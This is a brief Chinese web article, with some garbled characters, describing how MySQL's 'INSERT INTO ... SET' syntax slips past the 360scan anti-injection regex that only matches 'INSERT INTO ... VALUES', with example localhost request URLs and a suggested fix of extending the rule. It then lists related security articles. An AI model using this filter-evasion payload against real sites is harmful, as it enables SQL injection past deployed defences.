Mysql語法繞過360scan insert防注入方法
發(fā)布時間:2014-05-07 11:36:41 作者:佚名
我要評論
其實Mysql不只可以用insert into xxx values 插入數(shù)據(jù),還可以:insert into xxx set xx =方法
360scan正則:INSERT\\s+INTO.+?VALUES
其實Mysql不只可以用insert into xxx values 插入數(shù)據(jù),還可以:insert into xxx set xx =
提交:
http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')
提交set語法:
http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

修復方法當然最好是加上set了。
相關文章
- 最近看到網上曝出的dedecms最新版本的一個注入漏洞利用,漏洞PoC和分析文章也已在網上公開.但是在我實際測試過程當中,發(fā)現(xiàn)無法復現(xiàn)2013-06-11
- 我們以一個學習的心態(tài)來對待這些PHP后門程序,很多PHP后門代碼讓我們看到程序員們是多么的用心良苦2013-06-19
- 這篇文章主要介紹了防范 dedecms 廣告內容插入后門,需要的朋友可以參考下2014-06-27
記一次發(fā)現(xiàn)利用preg_replace隱藏后門和后續(xù)探究
php后門有很多,包子也見多了和玩多了,但是在一次幫助朋友檢查服務器的時候,竟然發(fā)現(xiàn)這樣的惡意代碼2014-06-27Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法
這篇文章主要為大家介紹了Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法,對于網絡安全而言非常重要!需要的朋友可以參考下2014-07-05各種網頁掛馬方式原理揭密(iframe掛馬,script 掛馬,圖片偽裝掛馬等)
現(xiàn)在,網站經常被各種網頁掛馬,為了保障大家網站的安全和互聯(lián)網用戶的安全,有必要對網頁掛馬有所了解。查了一些資料,由于存在大量的黑客軟件,一個菜鳥只需幾分鐘就可以2016-05-07- SQL注入是從正常的WWW端口訪問,而且表面看起來跟一般的Web頁面訪問沒什么區(qū)別,所以目前市面的防火墻都不會對SQL注入發(fā)出警報,如果管理員沒查看IIS日志的習慣,可能被入2016-05-21
- 流量圈的故事很多,劫持與反劫持的故事在很長時間內將繼續(xù)演繹下去。流量是很多互聯(lián)網企業(yè)賴以生存的基礎,通過優(yōu)秀的產品去獲得用戶和流量是唯一的正途,用戶的信任來之不2016-05-25

